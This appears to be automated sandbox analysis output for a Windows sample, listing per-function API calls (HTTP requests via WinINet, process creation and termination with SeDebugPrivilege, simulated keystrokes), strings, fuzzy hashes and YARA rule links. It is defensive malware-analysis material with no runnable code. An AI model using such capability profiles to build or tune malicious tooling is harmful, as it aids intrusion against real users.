Opcode Fuzzy Hash: db488f47ed9725317271185d39868e4cf5c1dd7bea57e6160ae0cafc82cb47eb
Instruction Fuzzy Hash: A7717F31500206DFCF318F64CC84AAA7BB6FF49324F54426AED965B2A6DB319C91DB60

Function 00B11A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B11A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B11A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00B11ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B11AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B11AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00B11B10
InternetCloseHandle.WININET(00000000), ref: 00B11B57

Part of subcall function 00B12483: GetLastError.KERNEL32(?,?,00B11817,00000000,00000000,00000001), ref: 00B12498
Part of subcall function 00B12483: SetEvent.KERNEL32(?,?,00B11817,00000000,00000000,00000001), ref: 00B124AD

Strings

, xrefs: 00B11B01

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: f5a746e3ca4fc15f9a0a852463d41c77da65af7d148b086bec2e63c5843c8e23
Instruction ID: 4ac5110b97a8ab3d7872d1ccf829f509b8db9e575b00ab7d411ab95f8e43e1ec
Opcode Fuzzy Hash: f5a746e3ca4fc15f9a0a852463d41c77da65af7d148b086bec2e63c5843c8e23
Instruction Fuzzy Hash: E84181B1501219BFEB118F54CC85FFB7BACEF08354F40456AFA059B151EB709E859BA0

Function 00B18C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B2F910), ref: 00B18D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B2F910), ref: 00B18D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B18ED6
SysFreeString.OLEAUT32(?), ref: 00B18F00

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 7feae0b5838d64892c1bd5f2b40cbed076800fe7d19b725b8b752ffc9393c841
Instruction ID: f3cfa395bcae12cca4b79cafe9a105c939a378cea6806b85d9cb99792d8f2df6
Opcode Fuzzy Hash: 7feae0b5838d64892c1bd5f2b40cbed076800fe7d19b725b8b752ffc9393c841
Instruction Fuzzy Hash: BFF11B71A00109EFDB14DF94C888EEEB7B9FF49314F508598F515AB251DB31AE86CB90

Function 00B1F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B1F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B1F848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B1F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B1F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B1F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B1FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00B1FA7C
CloseHandle.KERNEL32(?), ref: 00B1FAAB
CloseHandle.KERNEL32(?), ref: 00B1FB22

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: a536433eb522217babd9704382693925623dab7b4c81170f40c90f992639a2bb
Instruction ID: 985af027e64d94f001c107f6dcb7a5307ef3ebf4dba112bf3dbfd3c94b5908d5
Opcode Fuzzy Hash: a536433eb522217babd9704382693925623dab7b4c81170f40c90f992639a2bb
Instruction Fuzzy Hash: 61E190316043019FC714EF24C991BABBBE5EF85354F5485ADF8999B2A2CB31EC81CB52

Function 00B04CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B03697,?), ref: 00B0468B

Part of subcall function 00B0466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B03697,?), ref: 00B046A4

Part of subcall function 00B04A31: GetFileAttributesW.KERNEL32(?,00B0370B), ref: 00B04A32

lstrcmpiW.KERNEL32(?,?), ref: 00B04D40
_wcscmp.LIBCMT ref: 00B04D5A
MoveFileW.KERNEL32(?,?), ref: 00B04D75

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: f6070c9ac7cc57d0366afe7602d14d2bde6747e4949ece36d773eaf25e638353
Instruction ID: 4b40217a01dd8962fb445afc59b340d087a0d6d12e5979d9fdbc0b065f021080
Opcode Fuzzy Hash: f6070c9ac7cc57d0366afe7602d14d2bde6747e4949ece36d773eaf25e638353
Instruction Fuzzy Hash: B25164B24083459BC725DBA0D981EDF77ECEF85350F40096EB289D3191EF35A588C766

Function 00B28645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B286FF

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 6b65e392ccb97e36bf2df673b1e4a53640df76e67018c5e3e8eda8d5ab840b20
Instruction ID: be364650d92418ca655e8c26485f64807df6160b94feff303f65adb9846e43c8
Opcode Fuzzy Hash: 6b65e392ccb97e36bf2df673b1e4a53640df76e67018c5e3e8eda8d5ab840b20
Instruction Fuzzy Hash: F0519130502264BEDF319F28AC85FA97BE5EB06710F6041A5F958EB1E1CF75AD90CB41

Function 00AA2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00ADC2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00ADC319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00ADC331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00ADC34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00ADC370
DestroyIcon.USER32(00000000), ref: 00ADC37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00ADC39C
DestroyIcon.USER32(?), ref: 00ADC3AB

Part of subcall function 00B2A4AF: DeleteObject.GDI32(00000000), ref: 00B2A4E8

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 4cf617d18ae802a237726a37c7edbd29c9ef24bb9102fb8b97bab031e678f8e6
Instruction ID: f9f238aaaea1a21c12504b3c49e08a84283ba96c7cc6bf44519702735e206fa9
Opcode Fuzzy Hash: 4cf617d18ae802a237726a37c7edbd29c9ef24bb9102fb8b97bab031e678f8e6
Instruction Fuzzy Hash: 19515C70A00206AFDB24DF68CC45FAA7BB5EB59320F104529F912D76E0DBB0ED61DB60

Function 00AF966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AFA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AFA84C
Part of subcall function 00AFA82C: GetCurrentThreadId.KERNEL32 ref: 00AFA853
Part of subcall function 00AFA82C: AttachThreadInput.USER32(00000000,?,00AF9683,?,00000001), ref: 00AFA85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 00AF968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00AF96AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00AF96AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 00AF96B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00AF96D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00AF96D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 00AF96E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00AF96F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00AF96FB

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: bf1e272e44e44435af8bcec54bf6048a8db12b63269cbe416d2348a60650e6e9
Instruction ID: 7af58fc82dea75ff2742d50b053ca9a1f56325635e4ee0d1678aa2daa8504cc1
Opcode Fuzzy Hash: bf1e272e44e44435af8bcec54bf6048a8db12b63269cbe416d2348a60650e6e9
Instruction Fuzzy Hash: E511E1B1910219BEFA216F60DC89F7A7B2DEB4C791F500435F344AB0A0CEF25C11DAA4

Function 00AF8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00AF853C,00000B00,?,?), ref: 00AF892A
HeapAlloc.KERNEL32(00000000,?,00AF853C,00000B00,?,?), ref: 00AF8931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AF853C,00000B00,?,?), ref: 00AF8946
GetCurrentProcess.KERNEL32(?,00000000,?,00AF853C,00000B00,?,?), ref: 00AF894E
DuplicateHandle.KERNEL32(00000000,?,00AF853C,00000B00,?,?), ref: 00AF8951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00AF853C,00000B00,?,?), ref: 00AF8961
GetCurrentProcess.KERNEL32(00AF853C,00000000,?,00AF853C,00000B00,?,?), ref: 00AF8969
DuplicateHandle.KERNEL32(00000000,?,00AF853C,00000B00,?,?), ref: 00AF896C
CreateThread.KERNEL32(00000000,00000000,00AF8992,00000000,00000000,00000000), ref: 00AF8986

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: db0e19f38d3a072bada63dda6b19950478fdbacf480ff541c29ad34e5049e245
Instruction ID: 444f5fe02cd973771e6bdee4b4336aee5b84ada9e5348f4f1f4850d7665027d4
Opcode Fuzzy Hash: db0e19f38d3a072bada63dda6b19950478fdbacf480ff541c29ad34e5049e245
Instruction Fuzzy Hash: 4E01BF75640309FFE720ABA5DD4EF673B6CEB89711F404421FA05DB191CA749811CB20

Function 00B19B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00B19BA4, 00B19EC8
Not an Object type, xrefs: 00B19B7B

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: bb56c2297c0712894eaa0e7b8351b15e3a102e0deec88a391a25bb90b889b041
Instruction ID: dffe8dc2bd3ff690884f72a369cb54b2de8248427032b0c6b0ac1eed8546074e
Opcode Fuzzy Hash: bb56c2297c0712894eaa0e7b8351b15e3a102e0deec88a391a25bb90b889b041
Instruction Fuzzy Hash: 59C1C371A0024A9FDF10DF98D894BEEB7F5FF48314F5484A9E905AB280E770AD85CB90

Function 00B19113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B19167
VariantInit.OLEAUT32(?), ref: 00B19238
VariantInit.OLEAUT32(?), ref: 00B19339
VariantClear.OLEAUT32(?), ref: 00B19343
VariantClear.OLEAUT32(?), ref: 00B193A0

Strings

Null Object assignment in FOR..IN loop, xrefs: 00B191C8, 00B192F6, 00B193AE
Incorrect Object type in FOR..IN loop, xrefs: 00B1931C

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 34535308ada0ccf45de12e5cef084e6b75f8b97b58b74ad1678c0552d280491f
Instruction ID: dd77747d8b0a0bcf45f0aa7d5548a042fe344ddf805a0805eed82fbf4365571e
Opcode Fuzzy Hash: 34535308ada0ccf45de12e5cef084e6b75f8b97b58b74ad1678c0552d280491f
Instruction Fuzzy Hash: 6691B031A00245EBDF24CFA5D898FEEB7F8EF45710F108199F515AB280D7709985CBA0

Function 00B1975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00AF710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7044,80070057,?,?,?,00AF7455), ref: 00AF7127
Part of subcall function 00AF710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7044,80070057,?,?), ref: 00AF7142
Part of subcall function 00AF710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7044,80070057,?,?), ref: 00AF7150
Part of subcall function 00AF710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7044,80070057,?), ref: 00AF7160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00B19806
_memset.LIBCMT ref: 00B19813
_memset.LIBCMT ref: 00B19956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00B19982
CoTaskMemFree.OLE32(?), ref: 00B1998D

Strings

NULL Pointer assignment, xrefs: 00B199DB

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: b8de839089f247ab038e40ef1dc45aec7980efb26974909351c3237288f9b836
Instruction ID: 91c3df793b341d5142f0f18bd9e42f7a98132ab76d1e2785043ba839d3e31f22
Opcode Fuzzy Hash: b8de839089f247ab038e40ef1dc45aec7980efb26974909351c3237288f9b836
Instruction Fuzzy Hash: 09914871D00229EBDB10DFA4DD91EDEBBB9EF09350F10416AF519A7291DB31AA44CFA0

Function 00B26D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B26E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00B26E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B26E52
_wcscat.LIBCMT ref: 00B26EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00B26EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B26EF2

Strings

SysListView32, xrefs: 00B26DF6

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 248ca4442a89551f4d4bbab62472a5fabe3ef87a5a1629563f61bcadb3a6ea2e
Instruction ID: 82ecd6a76f1ef51b5bdea443157e9e8b8b47a72145594dfb3a6e2505e64bfaad
Opcode Fuzzy Hash: 248ca4442a89551f4d4bbab62472a5fabe3ef87a5a1629563f61bcadb3a6ea2e
Instruction Fuzzy Hash: 0A41C070A00319ABEB219F64DC85FEE77F8EF08350F1008AAF588E7291D6719D84CB60

Function 00B1E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00B03C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00B03C7A
Part of subcall function 00B03C55: Process32FirstW.KERNEL32(00000000,?), ref: 00B03C88
Part of subcall function 00B03C55: CloseHandle.KERNEL32(00000000), ref: 00B03D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B1E9A4
GetLastError.KERNEL32 ref: 00B1E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B1E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 00B1EA63
GetLastError.KERNEL32(00000000), ref: 00B1EA6E
CloseHandle.KERNEL32(00000000), ref: 00B1EAA3

Strings

SeDebugPrivilege, xrefs: 00B1E9C2

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: daf6c4de40b6a0af9bab247be642dec14f20483aa2043f7d3667e7f674ec69fd
Instruction ID: 8016ff6fd69dbe85291c0ca9c38c50e1fe44c81d48d0812b1e3a0e1818477f91
Opcode Fuzzy Hash: daf6c4de40b6a0af9bab247be642dec14f20483aa2043f7d3667e7f674ec69fd
Instruction Fuzzy Hash: 2441CC312002019FDB25EF54CD95FBEBBE5AF45714F4884A8FA029B2D2CB78E845CB95

Function 00B02F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00B03033

Strings

stop, xrefs: 00B03004
blank, xrefs: 00B02FB5
warning, xrefs: 00B0301C
question, xrefs: 00B02FEC
info, xrefs: 00B02FD4

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: c6d5495d3fd4444f16aed7a283d5b1cc6053ba38f7455e0e4648f22d870f495e
Instruction ID: 39ebc30e4dbb7596478b794f95067b5e58cd81ed9a95028e9a5cb5d158eca378
Opcode Fuzzy Hash: c6d5495d3fd4444f16aed7a283d5b1cc6053ba38f7455e0e4648f22d870f495e
Instruction Fuzzy Hash: C5110535249386BAE7159A14EC86F6B6FECDF25760B2000EAF900B61C1FAB05F4456A4

Function 00B042F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B04312
LoadStringW.USER32(00000000), ref: 00B04319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B0432F
LoadStringW.USER32(00000000), ref: 00B04336
_wprintf.LIBCMT ref: 00B0435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B0437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00B04357

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
